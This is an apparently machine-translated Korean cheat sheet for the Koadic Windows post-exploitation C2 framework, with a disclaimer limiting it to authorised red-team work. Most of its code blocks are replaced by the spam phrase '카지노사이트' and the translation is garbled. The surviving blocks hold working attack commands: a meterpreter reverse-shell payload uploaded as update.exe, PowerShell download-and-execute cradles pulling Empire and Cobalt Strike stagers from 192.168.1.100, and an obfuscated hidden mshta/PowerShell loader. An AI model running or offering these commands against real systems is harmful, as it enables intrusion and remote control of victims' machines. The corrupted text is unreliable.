Koadic C2 프레임 워크 열 시트¶
제품정보¶
Koadic은 명령 및 제어 작업을 위한 COM (Component Object Model) 개체를 레버리지하는 Windows 포스트 폭발 프레임 워크입니다. 파이썬에 내장 된 Koadic은 Windows 구성 요소 및 JavaScript 실행을 사용하여 생활 오프-랜드 기술에 중점을두고 지속성을 유지하고 포괄적 인 포스트 폭발 기능을 제공하는 동안 탐지를 방지합니다.
· ** 보증**: 이 도구는 공인 된 침투 테스트 및 빨간색 팀 운동에만 사용됩니다. 모든 대상에 대해 사용하기 전에 적절한 권한이 있습니다.
설치하기¶
자주 묻는 질문¶
카지노사이트
GitHub에서 설치¶
카지노사이트
Docker 설치¶
카지노사이트
Kali Linux 설치¶
카지노사이트
기본 사용¶
Koadic 시작하기¶
카지노사이트
명령 선 공용영역¶
카지노사이트
기본 명령¶
카지노사이트
단계 및 임플란트¶
MSHTA 스테퍼¶
카지노사이트
Rundll32 댄서¶
카지노사이트
Regsvr32 댄서¶
카지노사이트
WScript 댄서¶
ο 회원 관리
PowerShell 댄서¶
카지노사이트
좀비 관리¶
기본 Zombie 명령¶
카지노사이트
좀비 상호 작용¶
카지노사이트
Multi-Zombie 운영¶
카지노사이트
Implant 단위¶
시스템 정보¶
카지노사이트
Credential 수확¶
카지노사이트
Persistence 기계장치¶
카지노사이트
옆 운동¶
카지노사이트
Privilege 확장¶
오프화이트
네트워크 운영¶
카지노사이트
파일 작업¶
오프화이트
고급 기능¶
Pivoting 및 터널링¶
카지노사이트
Keylogging 및 스크린 캡처¶
카지노사이트
자료 Exfiltration¶
카지노사이트
자동화 및 스크립트¶
Python 자동화 스크립트¶
카지노사이트
PowerShell 자동화¶
카지노사이트
Bash 자동화 스크립트¶
카지노사이트
다른 도구와 통합¶
Metasploit 통합¶
```bash
Use Koadic for initial access, pivot to Metasploit¶
Generate Metasploit payload¶
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
Upload via Koadic zombie¶
use implant/manage/upload set ZOMBIE [zombie_id] set LPATH ./meterpreter.exe set RPATH C:\Windows\Temp\update.exe run
Execute Metasploit payload¶
zombie [zombie_id] cmd "C:\Windows\Temp\update.exe"
Handle in Metasploit¶
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.1.100 set LPORT 8443 run ```의 경우
Empire 통합¶
```bash
Generate Empire stager¶
Use Koadic for initial access, pivot to Empire¶
From Koadic zombie¶
zombie [zombie_id] shell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
Handle in Empire¶
./empire listeners uselistener http set Host 192.168.1.100 set Port 8080 execute ```에 대하여
Cobalt Strike 통합¶
```bash
Beacon integration¶
Generate Cobalt Strike beacon¶
Use Koadic for initial access, pivot to Beacon¶
From Koadic zombie¶
zombie [zombie_id] shell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
Handle in Cobalt Strike team server¶
```의 경우
운영 보안¶
통신 보안¶
```bash
Use HTTPS with valid certificates¶
Configure domain fronting¶
Implement certificate pinning¶
Use legitimate user agents¶
Example HTTPS configuration¶
Generate SSL certificates¶
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
Configure Koadic with SSL (if supported)¶
Use reverse proxy with SSL termination¶
```에 대하여
교통 의무¶
```bash
Use legitimate Windows binaries¶
Implement jitter and delays¶
Mimic legitimate traffic patterns¶
Use common ports and protocols¶
Example obfuscated execution¶
mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command """"& \{Start-Sleep -Seconds (Get-Random -Minimum 5 -Maximum 30); IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100:9999/sales')\}"""", 0, False")(window.close) ```의 경우
안티 포렌식¶
카지노사이트
문제 해결¶
일반적인 문제¶
카지노사이트
Debug 모드¶
카지노사이트
최고의 연습¶
운영 계획¶
- Pre-engagement 설정: 참여하기 전에 단계와 청취자를 구성
- ** 좀비 관리 **: descriptive zombie 이름과 네트워크 구성
- 통신 프로토콜: 보안 C2 통신 채널 구축
- ** 데이터 처리**: 안전한 데이터 수집 및 저장
- 명세 ** 청소 절차 **: artifact 제거 및 zombie 정리 계획
보안 고려 사항¶
카지노사이트
문서 및 보고¶
카지노사이트
지원하다¶
*이 속임수 시트는 Koadic C2 프레임 워크를 사용하여 포괄적 인 참조를 제공합니다. 항상 적색 팀 운영 또는 침투 테스트를 수행하기 전에 적절한 승인이 있습니다. *필수